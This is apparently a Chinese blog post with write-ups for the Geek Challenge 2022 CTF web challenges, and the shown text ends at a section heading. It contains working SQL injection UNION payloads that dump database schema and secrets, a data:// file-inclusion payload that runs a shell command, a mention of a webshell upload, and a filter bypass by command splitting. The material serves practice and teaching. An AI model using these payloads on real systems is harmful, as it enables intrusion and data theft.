<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
<script>
(function(){
    if(''){
        if (prompt('请输入文章密码') !== ''){
            alert('密码错误！');
            history.back();
        }
    }
})();
</script>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/aixin.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/aixin.png">
  <link rel="mask-icon" href="/images/aixin.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//img.hzy2003628.top/busuanzi/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-big-counter.min.css">
  <script src="true"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"hzy2003628.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null,"activeClass":"valine"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":-1,"unescape":false,"preload":true},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideLeftIn"}},"path":"search.xml"};
  </script>



<script>
(function(){
var src = "https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.js";
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();
</script>




<!-- title、keywords、desc关键字 -->

  <title>留言板</title>
  <meta name="title" content="留言板" />






 <script>(function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/b6dbddb6.js","daovoice")
 daovoice('init', {
  app_id: "6f081c2c"
});
daovoice('update');
 </script>
 





<!-- 春节灯笼代码段 -->
<div id="lantern-wrapper" class="lantern-wrapper" no-select></div>
<script src="http://img.hzy2003628.top/busuanzi/lantern.min.js"></script>
<script>
    let lantern = new Lantern('lantern-wrapper', {
        date: {								// 日期格式：'月-日'
            from: '12-20',					// 开始悬挂灯笼的日期
            to: '1-31'						// 结束悬挂灯笼的日期
        },
        postion: {
            zIndex: 9999,					// 整个灯笼的 z-index 属性
            lanternRL: [10, 150, 150, 10],	// 灯笼距离边界的距离：左侧灯笼距离左边的距离，右侧登录距离右侧的距离；页面灯笼从左往右依次设置
            lanternTop: 0					// 灯笼距离顶部的距离。你也可以使用数组从左往右依次设置每个灯笼的距顶距离，例如：[0, 100, 200, 300]
        },
        content: '新春快乐'					 // 灯笼内显示的文字，只会截取前四个字符
    });
</script>


  <meta property="og:type" content="article">
<meta property="og:title" content="Geek Challenge 2022">
<meta property="og:url" content="https://hzy2003628.top/2022/11/21/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982022/index.html">
<meta property="og:site_name" content="风尘孤狼">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212356236.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151351302.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151356858.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151357902.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162128087.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160037089.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151421066.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162123296.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162124430.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151428549.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151433681.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151434125.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151437028.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151442865.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151440089.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151445787.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151449871.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151453731.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151453608.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151507056.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171447435.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151508086.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151509532.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151510247.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151524817.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160029506.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160031398.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151533708.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151534612.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212132381.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212132327.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161806459.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161807194.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161913269.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162029989.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161809298.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161945659.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161946516.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161946009.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161947433.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161947349.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162102798.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212320250.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212321860.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212322679.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212323436.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212325811.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212328191.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212330756.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212330307.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212336570.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151555492.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151604248.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151605327.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160106204.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160107204.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160114389.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160116991.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171442687.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171604365.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171609624.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171610157.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171612352.png?x-oss-process=hzy">
<meta property="article:published_time" content="2022-11-21T15:36:39.000Z">
<meta property="article:modified_time" content="2022-11-21T16:07:03.320Z">
<meta property="article:author" content="故里">
<meta property="article:tag" content="赛后复盘">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212356236.png?x-oss-process=hzy">

<link rel="canonical" href="https://hzy2003628.top/2022/11/21/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982022/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>



  <title>Geek Challenge 2022 | 风尘孤狼</title>
  


  <script data-pjax>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d1ea9671a278a2cb33e24c76d08af22f";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">

<!-- 加入APlayer音乐播放器 -->
<link rel="stylesheet" href="/dist/APlayer.min.css">
<div id="aplayer"></div>
<script type="text/javascript" src="/dist/APlayer.min.js"></script>
<script type="text/javascript" src="/dist/music.js"></script>

  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">风尘孤狼</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">知识型学习记录</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">37</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">18</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">103</span></a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
        <li class="menu-item menu-item-love">

    <a href="/Love/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>Love</a>

  </li>
        <li class="menu-item menu-item-loveshow">

    <a href="/LoveShow/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>LoveShow</a>

  </li>
        <li class="menu-item menu-item-whisper">

    <a href="/Whisper/" rel="section"><i class="fa fa-calendar fa-fw"></i>微言</a>

  </li>
        <li class="menu-item menu-item-guestbook">

    <a href="/guestbook/" rel="section"><i class="fa fa-book fa-fw"></i>留言板</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>




    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://hzy2003628.top/2022/11/21/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982022/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="故里">
      <meta itemprop="description" content="没有所谓失败，除非你不再尝试">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="风尘孤狼">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Geek Challenge 2022
        </h1>

        <div class="post-meta">  
		 
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-11-21 23:36:39" itemprop="dateCreated datePublished" datetime="2022-11-21T23:36:39+08:00">2022-11-21</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-11-22 00:07:03" itemprop="dateModified" datetime="2022-11-22T00:07:03+08:00">2022-11-22</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" itemprop="url" rel="index"><span itemprop="name">赛后复盘</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span id="/2022/11/21/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982022/" class="post-meta-item leancloud_visitors" data-flag-title="Geek Challenge 2022" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/11/21/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982022/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/11/21/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982022/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>11k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>10 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212356236.png?x-oss-process=hzy" alt="image-20221121235649120"></p>
<span id="more"></span>
<h1 id="前言">前言</h1>
<p>成都信息工程大学的比赛，为其七天，来打打学习一下</p>
<h1 id="web">WEB</h1>
<h2 id="can-can-need">Can Can Need</h2>
<p>就是考察报文头，这个考察的比较细点</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151351302.png?x-oss-process=hzy" alt="image-20221115135122163"></p>
<p>SYC{E3sy_Http_hhXD2333}</p>
<p>这个文章说了所有的报文都是代表的啥意思</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45521281/article/details/105775452">(77条消息) CTF-WEB——HTTP Headers类型_WHOAMIAnony的博客-CSDN博客_ctf header</a></p>
<h2 id="l0vesyc">L0veSyc</h2>
<p>签到题</p>
<p>SYC{We1c0me_t0_Geek_2022!}</p>
<h2 id="来发个包">来发个包</h2>
<blockquote>
<p>hint: vanzy写了个拿flag的接口，但是好像有东西忘记改了</p>
</blockquote>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151356858.png?x-oss-process=hzy" alt="image-20221115135655803"></p>
<p>看源码</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151357902.png?x-oss-process=hzy" alt="image-20221115135718843"></p>
<p>根据提供的接口直接构造，得到flag</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162128087.png?x-oss-process=hzy" alt="image-20221116212811002"></p>
<p>SYC{:D_y0u_has_known_how_to_construct_a_requests_by_yourself}</p>
<h2 id="justphp">justphp</h2>
<p>题目源码如下</p>
<pre><code class="hljs plaintext">&lt;?php
error_reporting(0);
include_once (&quot;flag.php&quot;);
highlight_file(__FILE__);
$sleeptime=$_GET[&#x27;SleepTime&#x27;];
if(isset($sleeptime))
&#123;
    if(!is_numeric($sleeptime))
    &#123;
        echo &#x27;时间是一个数字啊喂！&#x27;;
    &#125;
    else if($sleeptime &lt; 86400 * 30)
    &#123;
        echo &#x27;这点时间哪够Canzik学长睡啊&#x27;;
    &#125;
    else if($sleeptime &gt; 86400 * 60)
    &#123;
        echo &#x27;别让Canzik学长睡死在这啊！&#x27;;
    &#125;
    else
    &#123;
        echo &#x27;&lt;br/&gt;Canzik学长很满足,表示这次把这辈子的觉都睡完啦！flag在这,自己拿吧:&lt;br/&gt;&#x27;;
        sleep((int)$sleeptime);
        echo $flag;
    &#125;
&#125;
?&gt; 时间是一个数字啊喂！</code></pre>
<p>如果按照常理的话应该SleepTime在两个值之间，还得是数字，然后就会跳到最后一个else，但是sleep，显然不行</p>
<p>正确解法is_numeric和sleep两个函数的绕过</p>
<blockquote>
<p>is_numeric() 函数用于检测变量是否为数字或数字字符串。若是则为true,否则为false</p>
</blockquote>
<p>sleep函数可以使用科学计数法绕过</p>
<blockquote>
<p>构造一个time=0.3e07（等价于0.3乘10的7次方）的参数，当它强制转化为零的时候就会变成零，这样可以满足条件</p>
</blockquote>
<p>is_numeric函数用0.3e07的数绕过</p>
<blockquote>
<p>进行比较运算时，如果遇到了0e\d+这种字符串，就会将这种字符串解析为科学计数法。所以上面例子中2个数的值都是0因而就相等了。如果不满足0e\d+这种模式就不会相等</p>
</blockquote>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160037089.png?x-oss-process=hzy" alt="image-20221116003719017"></p>
<p><code>SYC&#123;C@nzik#lik3s_to#sleeP_in_class?*#&#125;</code></p>
<h2 id="登陆试试">登陆试试</h2>
<blockquote>
<p>hint: Syclover用户忘了他的密码，咋办哦,依稀记得密码为6位数字,以774开头，这次我们来爆爆他的密码，让他再也不犯相同的错了</p>
</blockquote>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151421066.png?x-oss-process=hzy" alt="image-20221115142122917"></p>
<p>就是个单纯爆破，字典密码用md5加密爆破774000-774999</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162123296.png?x-oss-process=hzy" alt="image-20221116212347212"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162124430.png?x-oss-process=hzy" alt="image-20221116212407356"></p>
<p>SYC{xi_huan_4_l}</p>
<h2 id="welcomesql">WelcomeSQL</h2>
<blockquote>
<p>hint: 你能找到admin的秘密吗？</p>
</blockquote>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151428549.png?x-oss-process=hzy" alt="image-20221115142857403"></p>
<p>判断出来是GET注入+数字型</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151433681.png?x-oss-process=hzy" alt="image-20221115143326585"></p>
<p>id到5就没了，说明字段是4</p>
<p>使用联合注入</p>
<pre><code class="hljs plaintext">-1 union select 1,2</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151434125.png?x-oss-process=hzy" alt="image-20221115143444018"></p>
<p>3就报错了，接下来继续查询获取当前数据名</p>
<pre><code class="hljs plaintext">-1 union select 1,database()</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151437028.png?x-oss-process=hzy" alt="image-20221115143700917"></p>
<p>获取所有数据库名</p>
<pre><code class="hljs plaintext">-1 union select 1,group_concat(schema_name)from information_schema.schemata</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151442865.png?x-oss-process=hzy" alt="image-20221115144201730"></p>
<p>获取WelcomeSQL数据库的表名</p>
<pre><code class="hljs plaintext">d=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema=&#x27;WelcomeSQL&#x27;
</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151440089.png?x-oss-process=hzy" alt="image-20221115144004948"></p>
<p>没看到flag，查mysql表名</p>
<p>着实没查到，再回到WelcomeSQL看看，查询user_info所有字段名</p>
<pre><code class="hljs plaintext">union select 1,group_concat(column_name) from information_schema.columns where table_schema=&#x27;WelcomeSQL&#x27; and table_name=&#x27;user_info&#x27;</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151445787.png?x-oss-process=hzy" alt="image-20221115144547638"></p>
<p>看到了secret，查询</p>
<pre><code class="hljs plaintext">union select 1,group_concat(secret) from WelcomeSQL.user_info</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151449871.png?x-oss-process=hzy" alt="image-20221115144921737"></p>
<p>找到flag</p>
<p>SYC{VV31c0me_T0_5QL1_vv01rd_!}</p>
<h2 id="jsfind">jsfind</h2>
<blockquote>
<p>hint: 游戏玩不了的话请使用chrome试试;你知道如何在js文件中找出敏感路径吗？</p>
</blockquote>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151453731.png?x-oss-process=hzy" alt="image-20221115145318668"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151453608.png?x-oss-process=hzy" alt="image-20221115145342528"></p>
<p>base64–&gt;JJEncode得到flag</p>
<p>SYC{D@y0u_LiKKe_D3code_EnCodE}</p>
<h2 id="ezr_f_i">ezR_F_I</h2>
<blockquote>
<p>hint: 想要得到flag就快来包含一下叭 可能你需要一台具有公网ip的服务器</p>
</blockquote>
<p>这个hint说明需要远程文件包含了</p>
<p>这个貌似http://会被过滤掉,后面也会加个.html，闹心</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151507056.png?x-oss-process=hzy" alt="image-20221115150706995"></p>
<pre><code class="hljs plaintext">?file=data:text/plain,&lt;?php%20system(%27cat%20/flag%27);;?&gt;</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171447435.png?x-oss-process=hzy" alt="image-20221117144754334"></p>
<p>SYC{Th1s_is_RFI_hahaha!}</p>
<h2 id="babyupload">babyupload</h2>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151508086.png?x-oss-process=hzy" alt="image-20221115150817035"></p>
<p>传一句话，直接传上去了</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151509532.png?x-oss-process=hzy" alt="image-20221115150909429"></p>
<p>SYC{welc0me_t0_up10ad_wor1d!}</p>
<h2 id="ezrce">ezrce</h2>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151510247.png?x-oss-process=hzy" alt="image-20221115151022134"></p>
<p>与佛论禅解出来注释如下</p>
<pre><code class="hljs plaintext">我都懂，我都明白，我是没有策略的防火墙，是被无限绕过的WAF，是扫不出马的EDR，是丢流量的探针，是没升级的态势感知，我守不住内网，也守不住你。#flag或许会在当前目录#</code></pre>
<p>根目录被过滤了，提示又说在当前目录，tac没有被过滤，但是但是不知道为啥tac不出来</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151524817.png?x-oss-process=hzy" alt="image-20221115152424703"></p>
<p>使用拆分命令绕过</p>
<pre><code class="hljs plaintext">a=l;b=s;$a$b</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160029506.png?x-oss-process=hzy" alt="image-20221116002923057"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160031398.png?x-oss-process=hzy" alt="image-20221116003103309"></p>
<p>SYC{y0u_n33d_a_g1rfr1nd}</p>
<h2 id="easyphp">easyphp</h2>
